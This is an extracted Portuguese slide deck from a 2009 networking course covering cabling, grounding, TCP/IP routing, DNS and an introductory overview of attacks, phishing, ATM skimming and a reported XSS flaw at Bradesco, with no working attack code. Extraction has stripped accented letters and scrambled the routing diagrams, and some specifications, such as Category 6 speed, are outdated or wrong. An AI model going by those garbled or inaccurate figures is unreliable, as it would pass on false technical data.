Você está na página 1de 315

REDES AVANADAS

Eudes Danilo Mendona eudesdanilo@gmail.com

12/09/2009

http://www.4shared.com/file/59507480/8e48421c/ SENAI_-_CURSO_AVANCADO_REDES.html
1

Pr-requisitos:
j Conhecimentos bsicos em redes

Apresentao
j Quem sou eu? j Quem so vocs? j O que esperam da matria? j Quais as experincias em Redes? j Conhecimentos em Windows Server e/ou

Linux?

Sinopse:
I - Reviso dos Conhecimentos Bsicos de Redes: Conceitos de Redes, equipamentos, perifricos e conexo da rede II - Noes de Cabeamento Estruturado: Conhecimento de Asbuilt, certificao de uma rede, elaborao de um anteprojeto de rede, elaborao de um projeto de redes. III - Noo de Protocolo de Rede : Conhecimento da camada OSI, estudo do protocolo TCP/IP, subnet de rede, roteamento de rede IV - Redes Ponto-a-Ponto Projeto; V - Segurana de Rede: Noes de segurana fsica e lgica, objetivos, introduo a ataques, vulnerabilidade, como previnir ataques VI - Windows 2003 Server: Instalao, configurao de servios (DHCP, DNS, WINS, IIS, FTP), servidor de arquivos, servidor de Impresso, Active Direct, Segurana em nvel de recursos - Permisses de arquivos, Backup e Recuperao, Logs e Servios, Monitoramento fsico e lgico da rede VII Linux: Instalao, configurao de servios (DHCP, FTP, APACHE, SSH), Segurana em nvel de Recursos - Permisses de arquivos, Backup e Recuperao, Logs, Servios, acessos apartir de estaes Windows e Transmisso de arquivos entre windows e linux VIII - Ambiente Misto: Integrao de servios (WEB, FTP, BACKUP) entre a plataforma Windows 2003 e Linux com os clientes Windows XP

Plano de Aula:
Utilizao de Notebook e datashow e prtica nos desktops de vocs;

Avaliao:
Sero avaliaes Mensais:

Materiais do curso e outros do autor


j

Senai Apostila http://www.4shared.com/file/51511261/48a51bbd/CURSO_TCNICO_EM_INFORMTICA_-_SENAI__TURMA_AVANCADA.html Redes Avanadas Power Point http://www.4shared.com/file/59507480/8e48421c/SENAI_CURSO_AVANCADO_REDES.html Redes Bsicas Power Point http://www.4shared.com/file/72507083/506ae8fd/SENAI_-_CURSO_BASICO_DE_REDES.html Esamaz Segurana de Sistemas http://www.4shared.com/file/39802306/e79291cf/Segurana_de_sistema.html Firewall http://www.4shared.com/file/40014575/5e5292cb/Firewall.html Script Linux http://www.4shared.com/file/42267953/f6df6fc4/SCRIPT_LINUX.html Vrus http://www.4shared.com/file /42802741/12513457/virus.html Criptografia http://www.4shared.com/file/43349581/53517583/Criptografia.html Segurana de Redes http://www.4shared.com/file/54429137/c5875aa9/Seguranca_em_Redes_de_Computadores.html

Dvidas ??

I Reviso dos Conhecimentos Bsico de Redes

O que Redes de computadores?

Possibilitar o compartilhamento de informaes (programas e dados) armazenadas nos computadores da rede; Permitir o compartilhamento de recursos associados s mquinas interligadas; Permitir a troca de informaes entre os computadores interligados; Permitir a troca de informaes entre usurios dos computadores interligados; Possibilitar a utilizao de computadores localizados remotamente; Permitir o gerenciamento centralizado de recursos e dados; Melhorar a segurana de dados e recursos compartilhados 8

Porque ligar micros em rede?


j Palavra chave Compartilhamento.

Tipos de Redes
Ponto x Ponto
Usada em redes pequenas (normalmente at 10 micros); Baixo Custo; Fcil implementao; Baixa segurana; Sistema simples de cabeamento; Micros funcionam normalmente sem estarem conectados a rede;\ Micros instalados em um mesmo ambiente de trabalho; No existe um administrador de rede; No existe micros servidores; A rede ter problemas para crescer de tamanho.

10

Cliente x Servidor
tipo de rede aparece uma figura denominada servidor. O servidor um computador que oferece recursos especializados, para os demais micros da rede, ao contrrio do que acontece com a rede ponto-a-ponto onde os computadores compartilham arquivos entre si e tambm podem estar fazendo um outro processamento em conjunto). j Outra vantagem das redes cliente/servidor a forma centralizada de administrao e configurao, o que melhora a segurana e organizao da rede.
j Deseja ter uma maior segurana na rede. (Nesse

11

Tipos de Servidores
j

Servidor de Arquivos: um servidor responsvel pelo armazenamento de arquivos de dados como arquivos de texto, planilhas eletrnicas, etc... importante saber que esse servidor s responsvel por entregar os dados ao usurio solicitante (cliente), nenhum processamento ocorre nesse servidor, os programas responsveis pelo processamento dos dados dos arquivos deve estar instalados nos computadores clientes. Servidor de Impresso: um servidor responsvel por processar os pedidos de impresso solicitados pelos micros da rede e envi-los para as impressoras disponveis. Fica a cargo do servidor fazer o gerenciamento das impresses. Servidor de Aplicaes: responsvel por executar aplicaes do tipo cliente/servidor como, por exemplo, um banco de dados. Ao contrrio do servidor de arquivos, esse tipo de servidor faz processamento de informaes. Servidor de Correio Eletrnico: Responsvel pelo processamento e pela entrega de mensagens eletrnicas. Se for um e-mail destinado a uma pessoa fora da rede, este dever ser passado ao servidor de comunicao (firewall) Servidor de Comunicao (Firewall): Usado para comunicao da sua rede com outras redes, como a Internete Se voc acessa a Internet atravs de uma linha telefnica convencional, o servidor de comunicao pode ser um computador com uma placa de modem ou conexes com ADSL ou LPCD.
12

Vantagens e Desvantagem do Cliente x Servidor


j j j j j j

Custo Maior desempenho do que as redes ponto-a-ponto; Implementao necessita de especialistas; Melhor desempenho que as redes ponto-a-ponto; Alta segurana; Configurao e manuteno na rede feita de forma centralizada; Existncia de servidores, que so micros capazes de oferecer recursos aos demais micros da rede

13

II - Noes de Cabeamento Estruturado

14

Cabeamento Estruturado
j Conector RJ45 Macho

15

Cabeamento Estruturado
j Cabo UTP

j UTP Color Codes

Par 1 Branco-Azul (BA) / Azul (A) Par 2 Branco-Laranja (BL) / Laranja (L) Par 3 Branco-Verde (BV) / Verde (V) Par 4 Branco-Marrom (BM) / Marrom (M)
16

Cabeamento Estruturado
Cabo UTP / CATEGORIAS
j Categoria 1 cabo de par tranado tradicional, que o utilizado para

j j

j j

telefonia (instalado antes de 1983). No recomendado para utilizao em redes locais. Categoria 2 cabo certificado para transmisso de dados (possui 4 pares tranados). Sua utilizao em redes tambm no recomendvel. Categoria 3 esta categoria suporta 10 Mbit/sec numa rede Ethernet, 4Mbit/s em uma Token Ring. Este cabo permite que at quatro telefones normais ou dois multilinhas sejam conectados ao equipamento da companhia telefnica. Categoria 4 esta categoria suporta taxas de transmisso de at 16 Mbit/s em uma rede Token Ring. Este cabo possui quatro pares. Categoria 5 possui 4 pares tranados com oito tores. Suporta taxas de transmisso de 100 Mbit/s. Sua utilizao adequada para redes Fast Ethernet e redes ATM. No incio dos anos 90, 60% dos edifcios possuam este tipo de cabo (EUA). Categoria 6 tambm possui 4 pares tranados. Suporta taxas de transmisso de at 155 Mbit/s. Sua utilizao adequada a redes Fast Ethernet para transmisso de dados e voz.

17

Cabeamento Estruturado
j Crimpador

j Testador

18

Cabeamento Estruturado
j Delay
um dos itens mais importantes, pois a estruturao fsica pode influenciar na performance e velocidade da rede. ideal que tenha o menor nmero de segmentao e quando ocorrer a segmentao que seja centralizado os servidores, pontos de sada da rede e principais clientes no switch principal.

19

Cabeamento Estruturado
j Processo da Crimpagem

Normal - Padronizao EIA/TIA 568 Conhecida como


seqncia de crimpagem de normal. Utilizada para conexo de um microcomputador a um HUB ou SWITCH.
EIA/TIA-568 1. Branco-Verde 2. Verde 3. Branco-Laranja 4. Azul 5. Branco-Azul 6. Laranja 7. Branco-Marrom 8. Marrom

20

Cabeamento Estruturado
j Crossover
- Um cabo crossover consiste na interligao de 2 (dois) computadores pelas respectivas placas de rede sem ser necessrio a utilizao de um concentrador (Hub ou Switch) ou a ligao de modems a CABO com a maquina cliente com conectores do tipo RJ45. A alterao dos padres das pinagens dos cabos torna possvel a configurao de cabo crossover ou cabo direto. A ligao feita com um cabo de par tranado (na maioria das vezes) onde se tem: em uma ponta o padro T568A, e, em outra o padro T568B (utilizado tambm com modems ADSL).
2 ponta do cabo branco laranja laranja branco verde azul branco azul verde branco marrom marrom
21

1 ponta do cabo branco verde verde branco laranja azul branco azul laranja branco marrom marrom

Cabeamento Estruturado
j 1 Prtica: Processo da Crimpagem

22

Cabo Normal

23

Cabo Crowwover

24

Cabeamento Estruturado
j Certo

j Errado

25

Cabeamento Estruturado
j O que no pode ocorrer

26

Cabeamento Estruturado
j O que no pode ocorrer

27

Cabeamento Estruturado

28

Cabeamento Estruturado

29

Cabeamento Estruturado

30

Cabeamento Estruturado
2 Prtica: Processo da Crimpagem

31

Cabeamento Estruturado

32

Cabeamento Estruturado

33

Cabeamento Estruturado

34

Cabeamento Estruturado

35

Cabeamento Estruturado

36

Sugesto para a Rede Eltrica


tomadas; j No permitir que sejam ligados outros equipamentos como: Copiadoras, ventiladores, motores eltricos, ou qualquer outro que exija ou produza rudo na linha.
j Ideal ter a cada circuito de 10 A at 3

37

Sugesto para a Rede Eltrica

38

Sugesto para a Rede Eltrica


j As tomadas devem ser do tipo universal

de trs pinos (tripolares) e a ligao fase/neutro/terra

j As tenses aproximadas na rede eltrica devero ser as

seguintes: Entre terra e fase = 117 V Entre neutro e fase = 115 V Entre terra e neutro = 2,5 V(valor Maximo tolerado)

39

Sugesto para a Rede Eltrica

40

Aterramento
totalmente independente dos demais terras existentes. j Observando o seguinte na instalao: Ser construdo distncia mnima de 2,40m dos outros terras do quadro e do neutro e a uma distncia mnima de 25,00 do terra de pra-raios. O cabo que liga as barras de aterramento ao quadro deve ser encapado, possuir bitola compatvel com a distancia entre o sistema e o quadro, e NO DEVER ESTAR NUNCA CONECTADO AO NEUTRO.No so aconselhveis distncias maiores que 50m entre o terra e o quadro de distribuio.
41

j O terra dos equipamentos de informtica DEVE ser

Aterramento
j Material necessrio para um aterramento simples:

- 3 barras de cobre, com 2 a 3 metros de comprimento e 15cm de dimetro. - 6 abraadeiras de bronze para as barras de cobre. - 10 metros de fio isolado, de bitola idntica dos fios fase e neutro. - Sal grosso, carvo vegetal e enxofre em quantidades suficientes para cobrir o poo dos eletrodos. - gua destilada suficiente para regar a mistura. - As barras de cobre so chamadas eletrodos de aterramento; do uma referncia de terra de 0 volte uma conexo terra para descargas eltricas atmosfricas. Tambm fornecem uma trajetria de impedncia baixa terra ( valor mximo de 25 ohms).
42

Aterramento

43

Aterramento
j Consequncias da falta de aterramento:

- Apario de BAD CLUSTERS no HD ou at mesmo a perda total. Isto no demora a acontecer. - Voc poder perder seu HD em 2 ou 3 meses. - Danos na placa me. - Danos na memria, que podem vir a causar perda repentina de dados e ou congelamento de todo o sistema.
44

DOCUMENTAR UMA REDE


j Fsicamente:
- Asbuilt

j Lgicamente:
- Software Inventrio; - Help Desk;
(http://www.softwarepublico.gov.br/spb/vercomunidade?community_id=3585) (http://ocomonphp.sourceforge.net/) (Network supervisor 3COM)

- Analyzer Network;

- Logs (Firewall, event view, /var/log/messages)


45

Criao de AnteProjeto de Rede


j Veja quando falamos em projeto, no

queremos e no vamos formar engenheiros aqui, nossa inteno e mostrar que uma documentao bem feita pode ser o diferencial dentro desta rea , o projeto pode ser escrito, no necessariamente um desenho, lgico que se possuir o desenho muito melhor, mesmo porque hoje existem ferramentas para auxiliar neste propsito.
46

Criao de AnteProjeto de Rede

47

Elaborao de um Projeto de Rede


j Informaes repassada pelo empresa: - 1 Caso: Rede 100 % cabeada; - 2 Caso: Rede Mista j Criao da Documentao do Projeto: - Criano do Site Survey; - Criao do anteprojeto; - Entrega do Asbuilt pela empresa prestadora

do servio;
48

Criao dos Site Survey 1 Caso

49

Criao dos Site Survey 2 Caso

50

Viso Macro

Exerccio: Criao de anteprojeto


j Informaes repassada pelo empresa (Site

Survey):

As paredes externas so de cermico aparente e as paredes internas, incluindo as salas laterais , de reboco liso e pintado; O teto de forro falso e o piso de granito natural; O departamento de telemarketing possui divisrias baixas acsticas em formas de baias, de madeira, revestida com espuma de poliuretano e tecido grosso; Toda iluminao feita com luminrias com 4 lmpadas fluorescentes de 40 W x 220 V e localizada no centro geomtrico de cada ambiente; Altura entre o forro e o piso de 2,6m; A sala de treinamento, recebe freqentemente pessoas no ligadas a empresa, alm disso seu layout constantemente alterado;
52

Exerccio: Criao de anteprojeto

53

III Noes de Protocolo de rede

54

Protocolos - Definio

56

A Mensagem em Camadas
Remetente
Mensagem Escrita

-Voc tem uma idia e deseja comunica-la a outra pessoa -Tem de escolher a forma de expressar essa idia -Voc decide como de uma forma apropriada -Enfim, de fato expe sua idia Rodovia/Malote

Destinatrio
Mensagem Escrita

Envelope Agncia

Envelope Agncia

Protocolo TCP/IP

O que configurar ?
j IP j MASCARA j GATEWAY j DNS

59

Onde, o que e por que Configurar

IP e MASCARA

61

Endereos IP
j Endereo IP: Indentificador de Rede +

Indentificador de HOST
Endereo IP de it

Identificador da rede

Identificador do o t

host
RE E
internet

REDE

hosts com identi icadores de rede distintos.


REDE REDE

hosts com o mesmo i enti icador de rede.

62

Como atribuir IPs para rede abaixo?


SO PAULO CURITIBA

... 230 computadores

... 200 computadores

63

endereo classe : 255.255.255.0 identificador de rede identificador do host

00.0.0.

00.0.0.

00.0.0.

00.0.0.

00.0.0. rotea or 00.0. .

00.0. .
O rot

00.0. .
or ossui ois

00.0. .
r os I , um r

00.0. .
r .

64

Como Atribuir IPs para rede abaixo?


SO PAULO CURITIBA

... 400 computadores

... 600 computadores

... RIO DE JANEIRO 500 computadores


65

Solucionar Principais Problemas


j Usando o Utilitrio IPConfig
O utilitrio IPConfig muito til para determinar se as configuraes de rede atuais so desejadas. Vrios erros podem ser detectados atravs deste utilitrio. Execute-o atravs de um Prompt de Comando (clique em Start -> Run e digite CMD), digitando ipconfig /all e teclando Enter.

Solucionar Principais Problemas


j

Conflito de IP: Ocorre quando um IP manual atribudo mquina e j existe outro computador na rede com o mesmo IP. Nesse caso, a tela do Ipconfig deve se parecer com a seguinte:

Note que os campos IP e Mscara de Subrede esto zerados. Essa a principal caracterstica de um conflito de IPs. - Configurao incompleta: Certifique-se de que os campos DNS Servers e Default Gateway no esto em branco.
j

Solucionar Principais Problemas

j Note que, como no h servidor DNS e nem Default Gateway

configurados, o computador somente poder enviar e receber dados dentro da rede local e com outros computadores

Solucionar Principais Problemas


j Usando o Utilitrio PING
Ela se refere ao utilitrio do TCP/IP denominado "Ping", que tem como funo testar se um host est ativo, enviando um pacote de dados para esse host e pedindo uma reposta caso ele esteja online e funcionando corretamente. Ento, "pingar" o endereo de loopback simplesmente testa se sua mquina inicializou o TCP/IP corretamente. Para fazer isso, entre em um Prompt de Comando e digite: ping 127.0.0.1 e tecle Enter. Voc tambm poder pingar no IP da placa assim como de qualquer mquina da rede, assim como por nome dependendo de alguns servios. Vale ser ressalta que o ping pode ser desabilitado.

Solucionar Principais Problemas


j Usando o Utilitrio NETSTAT e TELNET
NETSTAT verifica os servios que localmente a mquina/host est provendo

TELNET: Tem como funo testar se o servio est ativo. Para fazer isso, entre em um Prompt de Comando e digite: telnet IP PORTA_SERVICO. Este Teste serve tanto se voc local ou remoto da mquina que est provendo o servio.

GATEWAY

71

Roteamento Indireto
j Origem e Destino esto em redes

diferentes
1 .35.143.1

Tabela de Roteamento Destino 1 .35.143. . . . Gateway DIRETO 1 .35.143.1 REDE 1 .35.144. 1 .35.144.15

1 .35.143.1

Router
REDE 1 .35.143.

1 .35.144.1

Tabela de Roteamento Destino 1 .35.143. 1 .35.144. ....... Gateway 1 .35.143.1 1 .35.144.1 .......

Tabela de Roteamento Destino 1 .35.144. . . . Gateway DIRETO 1 .35.144.1

Exemplo de roteamento
Exe plo de a rede Intranet constit da de duas redes fsicas conectadas por u roteador.
192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.4

192.168.0.5 rotea or interno 192.168.1.5

re e 192.168.0.x

re e 192.168.1.x

servi or

192.168.1.1

192.168.1.2

192.168.1.3

192.168.1.4

re e interna e uma em resa.

Tabelas de Roteamento

Exemplo de Tabela de Roteamento


TABELA DO ROTEADOR 1: Rede Gateway 200.134.51.0 (255.255.255.0) 200.134.51.1 200.17.98.0 (255.255.255.0) 200.17.98.23 0.0.0.0 (0.0.0.0) 200.130.0.2
200.17.98.23

Interface 200.134.51.1 200.17.98.23 200.130.0.1

INTERNET
REDE 200.17.98.X
roteador 1 roteador 2

200.134.51.1 200.130.0.1 200.130.0.2


75

REDE 200.134.51.X

Exerccio 1
j Construa a tabela de roteamento do Roteador 1
200.0.0.1
INTERNET

200.0.0.2 200.134.51.0 255.255.255.0

3 1
200.17.98.1 200.134.51.1

2
200.17.98.0 255.255.255.0 200.17.98.23

INTERNET

76

TABELA DE ROTEAMENTO
Rede Destino Mascara Gateway Interface Custo

77

TABELA DE ROTEAMENTO
Rede Destino 200.134.51.0 200.17.98.0 0.0.0.0 0.0.0.0 Mascara
255.255.255.0 255.255.255.0

Gateway
200.134.51.1

Interface
200.134.51.1

C sto 1 1 1 2

200.17.98.1

200.17.98.1

0.0.0.0 0.0.0.0

200.0.0.1
200.17.98.23

200.0.0.2
200.17.98.1

Exerccio 2:
j Utilizando a classe C: 200.0.0.0 (255.255.255.0)
A) distribua os IPs nas duas redes abaixo B) defina a tabela de roteamento do roteador 1.

1
100 computadores 100 computadores

INTERNET

79

DNS

80

DNS - Domain Name Service


j Padro Aberto para Resoluo de

Nomes Hierrquicos

Agrupa nomes em domnios. A rvore de nomes armazenada num banco de dados distribudo distribudo.

j Especificaes do DNS RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536.
Expecificaes da Internet Task Force

Berkeley Internet Name Domain (BIND)


Implementao desenvolvida na Berkley University para a verso 4.3 SD Unix

Demonstraes: Servios de Nomes


A f no principal dos servios de nomes trad zir nomes de domnio para os se s respectivos endereos IPs.
Servidor DNS
www.cade.com 10.10.10.1 www.oi.com = = 35.35.2.80

www.cade.com www.oi.com
www. fg.br = 20.20.20.80 www.av.com=50.75.96.8

www. fg.br www.av.com

IV Redes Ponto a Ponto

83

Elaborao de Projeto

84

Elaborao de Projeto
j Criar uma formulrio / checklist de

informaes que devero que sero coletadas junto a conversa inicial.

Qual a finalidade ? Quem vai acessar (de onde, como, que soluo) ? Quantos computadores ? De onde vai ser o acesso ? Qos? Local Fsico (disponibilidade para cabeamento)
85

Elaborar uma proposta / Soluo.


j Itens informados: - 2 casas (distante 500 mts) sendo que uma -

tombada pelo patrimnio histrico; Acesso de usurio em uma rede local e clientes via Web (internet); Acesso de funcionrios a pastas especficas de arquivos, assim como acesso ao sistema corporativo; 500 computares (300 comp. Em uma casa e 200 em outra); No posso para meu acesso nem por 1 minuto 86

Ilustrao do funcionamento do TCP/IP


j Vdeo Guerreiros da Internet

V - Segurana de Redes

88

O sistema informtico mais seguro no utilizvel O sistema informtico mais utilizvel inseguro S existe um computador 1 seguro, o desligado. %

89

Introduo
j A Segurana da Informao pode ser

definida como a proteo de dados contra a revelao acidental ou intencional a pessoas no autorizadas, e contra alteraes no permitidas.

j A segurana no universo computacional

divide-se em:

Segurana Fsica Segurana Lgica

90

Introduo (cont.)
j Objetivo da Segurana Informtica Seja qual for a dimenso de um sistema informtico, deve procurar-se atingir, na sua explorao, os seguintes objetivos:
Integridade do equipamento Confidencialidade e a qualidade da informao Prontido do sistema (eficincia x eficcia)

91

O que voc est tentando proteger?


j Seus dados

Integridade Privacidade Disponibilidade j Seus recursos j Sua reputao

92

Contra o que voc est tentando se proteger?


j Roubo de senhas j Engenharia Social j BUG & Backdoors j Falha de autenticao j Falha de protocolo j Obtendo Informaes j Negando servios (DoS)
93

Objetivos da Segurana
j O objetivo da segurana da informao

abrange desde uma fechadura na porta da sala de computadores at o uso de tcnicas criptogrficas sofisticadas e cdigos de autorizao. j O estudo no abrange somente o crime computacional (hackers), envolve qualquer tipo de violao da segurana, como erros em processamento ou cdigos de programao.
94

Objetivos da Segurana
Segurana no uma tecnologia

Quem? O que? Quando? Como? Onde? Porque?

Objetivos da Segurana
j A segurana de dados tem por objetivo

restringir o uso de informaes (softwares e dados armazenados) no computador e dispositivos de armazenamento associados a indivduos selecionados.

96

Os objetivos da Segurana da Informao so:


j Preservao do patrimnio da empresa

(os dados e as informaes fazem parte do patrimnio).

Deve-se preserv-lo protegendo-o contra revelaes acidentais, erros operacionais e contra as infiltraes que podem ser de dois tipos:
Ataques passivos (interceptao) Ataques ativos (interrupo, modificao e Fabricao)
97

Ataques passivos
Ataques Passivos
Intercepo

Anlise do contedo das mensagens

Anlise do trfego

O objetivo obter informao que est a ser transmitida. Este tipo de ataques muito difcil de detectar. O esforo de proteco deve ser no sentido da preveno.

Ataques Passivos
j Anlise do contedo das mensagens Escutar e

entender as informaes.

j Anlise do trfego O oponente pode determinar a

origem e identidade das comunicaes e pode observar a frequncia e comprimento das mesmas. Esta informao pode ser til para determinar a natureza da comunicao. Os ataques passivos so muito difceis de detectar porque no envolvem nenhuma alterao de dados. A nfase ou o esforo deve desenvolvido no sentido da preveno e no da deteco.

Intercepo

Emissor

Receptor

Intercepo

Intercepo Quando utilizadores no autorizados conseguem aceder a recursos para os quais no estavam autorizados. um ataque confidencialidade. A parte no autorizada pode ser uma pessoa, um programa ou um computador. Exemplos: violao de cabos de comunicao, para capturar dados da rede, cpia ilcita de pastas e programas, etc.

Ataques Ativos
Ataques Ativos

Interrupo (Disponibilidade)

Modificao (Integridade)

Fabricao (Autenticidade)

j Envolvem alguma modificao de dados. j Este tipo de ataques muito difcil de prever, j que, para isso,

seria necessrio uma proteo completa de todos os tipos de comunicaes e de canais. Por esta razo, o esforo de proteco deve ser no sentido de os detectar e recuperar dos atrasos ou estragos entretanto causados.

Interrupo

Emissor

Receptor

Interrupo

Interrupo A informao de um sistema torna-se indisponvel ou destruda. um ataque disponibilidade.


Exemplos: Destruio de peas de Hardware, o corte de linhas de comunicao, a inoperncia do sistema de ficheiros, etc.

Modificao

Emissor

Receptor

Modificao

Modificao uma parte no autorizada, no s acede informao, mas tambm a modifica. um ataque de integridade. Exemplos: alterao de valores num ficheiro de dados; alterao de um programa para que ele funcione de maneira diferente ou modificao do contedo de mensagens transmitidas pela rede.

Fabricao

Emissor

Receptor

Fabricao

Fabricao uma parte no autorizada insere dados falsos no sistema. um ataque autenticidade. Exemplos: insero de mensagens simuladas na rede ou a adio de registos a um ficheiro.

O que ataque?
Ataque toda ao realizada com intuito ou no de causar danos.

105

Vulnerabilidades
j Todo computador vulnervel a

ataques. (Possui informao)


Tipos de Vulnerabilidades

Vulnerabilidades Fsicas (Meio, Construo) Vulnerabilidades Naturais (Desastres Naturais) Vulnerabilidades de Hardware e Software(Falhas) Vulnerabilidades de Media (Roubos de Media) Vulnerabilidades de Comunicao (Hacker) Vulnerabilidades de Humanos (Usurios) Vulnerabilidades sobre Exploit (Brechas, Copias)

Um ataque tpico

107

Anatomia de um ataque
Varredura Reconhecimento

Enumerao Escalando privilgios Instalao de back doors Negao de Servios Acesso informao Ocultao de rastros

Invaso

109

110

O que um hacker ataca ?


Aplicaes Banco de dados Sistemas operacional Servios de rede

Tipos de ataques conhecidos


Escutas Packet Sniffing escuta e inspeciona cada pacote da rede IP/Session Hijacking interceptao da seo pelo invasor Senha Uso de dicionrio de senhas Fora bruta tentativa e erro Outros ataques Alterao de site (web defacement) Engenharia social Ataque fsico s instalaes da empresa Uso de cavalos de tria e cdigos maliciosos Trashing revirar lixo em busca de informaes War dialing liga para vrios nmeros de telefone para identificar os que tem modem instalado

112

Motivao para o Ataque


Por qu existem as invases aos sistemas? Orgulho Exibicionismo/fama Busca de novos desafios Curiosidade Protesto Roubo de informaes Dinheiro Uso de recursos adicionais Vantagem competitiva Vingana
113

Exemplo: Oliberal 10/02/08

114

Caso Real

Atualmente 70% das quebras de segurana corporativas so geradas internamente.

Caso Real

Perfil do Fraudador*: 68% esto na Mdia e Alta Gerncias 80% tem curso superior completo Predominantemente do Sexo Masculino Idade mdia entre 31 e 40 anos
*Pesquisa sobre crimes econmicos - PWC 05

Tipos de ataques conhecidos


Negao de servios Syn Flood inundar a fila de SYN para negar novas conexes Buffer overflow colocar mais informaes do que cabe no buffer Distributed DoS (DDoS) ataque em massa de negao de servios Ping of Death envio de pacote com mais de 65507 bytes Smurf envio de pacote ICMP em broadcast a partir de uma mquina, sendo inundada com as respostas recebidas CGI exploit Land, syn flooding, ... Simulao IP Spoofing uso do IP de uma mquina para acessar outra DNS Spoofing assumir o DNS de outro sistema Investigao Port scanning varredura de portas para tentar se conectar e invadir Spam Acesso a um grande nmero de pessoas, via email, com link para sites clonados que pedem informaes pessoais

117

Ex: Email para roubo de informaes

118

Ex: Email para roubo de informaes

119

Ex: Email para roubo de informaes

120

Ex: Email para roubo de informaes

121

Ex: Email para roubo de informaes

122

Ex: Email para roubo de informaes

123

Ex: Email para roubo de informaes

124

Ex2: Clonagem de carto de banco

Bocal preparado

125

Ex2: Clonagem de carto de banco

Imperceptvel para o cliente

126

Ex2: Clonagem de carto de banco

Micro cmera disfarada de porta panfleto

Ex2: Clonagem de carto de banco

Viso completa da tela e teclas digitadas

128

Ex2: Clonagem de carto de banco

Viso completa da tela e teclas digitadas

129

Ex2: Clonagem de carto de banco

Micro cmera Bateria Antena transmissora

130

Ex3: Email de promoo (roubo informao)

131

Ex3: Email de promoo (roubo informao)

132

Ex4: Antivirus Gratis

133

Ex5: Engenharia Social


j Ao atender um telefonema, o interlocutor se

identifica como vice-diretor da empresa. Voc j o viu pelos corredores, mas nunca falou com ele por telefone. Ele informa que se encontra na filial da empresa, em reunio, e est com problemas para acessar o sistema. Assim sendo, solicita a senha para que possa ter acesso. Informa, ainda, que est acompanhado de 10 pessoas que possuem outros compromissos e que no podem esperar por muito tempo.
134

Ex6: Email Receita Federal

135

Cpia de identidade visual de rgos pblicos

Pedido de download de arquivos / erros de portugus

Cpia de identidade visual de entidades populares

Histria estranha e mal contada

Necessidade urgente de download

Servio inexistente

Pedido de download de arquivos

Ameaas

Uso de marca popular

Distrbuio muito vantajosa de prmios

Pedido de download de arquivo

Uso de marca popular

Erro de portugus

Dvida inexistente

Falta de meno a endereo por extenso

Erro de portugus

Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisainst-xss/) Criminosos brasileiros conseguiram descobrir um problema em uma pgina do Bradesco que permitia que a mesma fosse alterada por meio de links, possibilitando o uso do domnio do banco para todo tipo de atividade maliciosa. Para tal, crackers enviaram e-mail em massa contendo um link que explorava uma falha de XSS (Cross Site Scripting) existente em uma pgina localizada em institucional.bradesco.com.br. Se clicado, o link enviava informaes pgina que causavam um comportamento indesejvel, fazendo com que argumentos da query string como chamada a parte do link depois do ponto de interrogao (asp?) fossem inseridas como cdigo, permitindo o ataque. Dias antes da publicao desta matria, a Linha Defensiva notificou o Bradesco. O banco removeu a pgina vulnervel dentro de aproximadamente 48 horas, inutilizando o ataque. A mensagem contendo o link que explorava a brecha solicitava o recadastramento das chaves de segurana usadas nas transaes atravs da Internet, convidando o usurio a faz-lo por meio do link.

142

Falha no site do Bradesco permitiu ataque XSS


(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)

Como demonstrado na imagem, a maioria dos navegadores e os programas de e-mails no exibem o endereo completo de uma URL, se esta for muito extensa, no permitindo que a existncia do golpe seja percebida. Embora o e-mail tenha usado uma tcnica refinada que facilmente poderia enganar at mesmo usurios com certa experincia, devido ao link camuflado, erros de ortografia caractersticos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de email em massa usado pelos criminosos no era compatvel com caracteres especiais, como acentos.

143

Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisainst-xss/)


XSS Cross Site Scripting, ou XSS, um tipo de vulnerabilidade onde determinada pgina de internet no filtra suficientemente as informaes enviadas pelo navegador web, sendo possvel faz-la exibir contedos de outros sites, ou contedos especificados no prprio link ou outra informao. Um exemplo clssico a pgina de busca. Em geral, pginas de buscas exibem na tela a informao que est sendo procurada (por exemplo, Voc est procurando por: [termo de pesquisa]). Se a exibio desta informao no for filtrada corretamente, a informao, em vez de exibida, ser interpretada como cdigo HTML pelo navegador, possibilitando o ataque. Fruns, livros de visitas e blogs (este ltimo, devido funo de comentrios) podem ser vtimas do XSS permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetar qualquer usurio que o ver. Este o ataque de XSS persistente, ou tipo 2. O Bradesco foi alvo do XSS impermanente ou no-persistente, tambm chamado de XSS tipo 1. O objetivo de ataques XSS geralmente roubar informaes importantes da vtima, tais como os cookies de autenticao. Porm, XSS tambm pode ser usado para alterar os sites e usar da confiana depositada pelo internauta na pgina para persuadi-lo a enviar informaes sigilosas, ou para rodar cdigo malicioso nos PCs de visitantes. A Linha Defensiva j noticiou a respeito de brechas semelhantes no YouTube e no Orkut. Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de email e similares no sejam clicados, a no ser quando estava-se esperando absolutamente o e-mail em questo (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que possvel, deve-se digitar o endereo do site na barra de endereos do navegador e procurar manualmente o que foi indicado no e-mail. Brechas de XSS tipo 2 so difceis de serem evitadas pelo usurio, sendo a responsabilidade do site nesses casos ainda maior, embora, em ltima instncia, a responsabilidade sempre seja do site. 144

Falha no site do Bradesco permitiu ataque XSS


(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)

Ao acessar o link, o internauta era direcionado para uma pgina do Bradesco (Index_Pesquisa.asp) que, vulnervel a XSS, carregava outra pgina, hospedada em um domnio brasileiro (cujo nome no foi divulgado por se tratar de um domnio legtimo comprometido). Em ataques XSS, pginas legtimas so usadas de forma maliciosa e um cdigo (no caso acima, um FRAMESET1) inserido na pgina legtima. O contedo da pgina ser, portanto, diferente do esperado. 145

Lista de Hackers fornecida:


j j j j j j j j j j j j j j j j

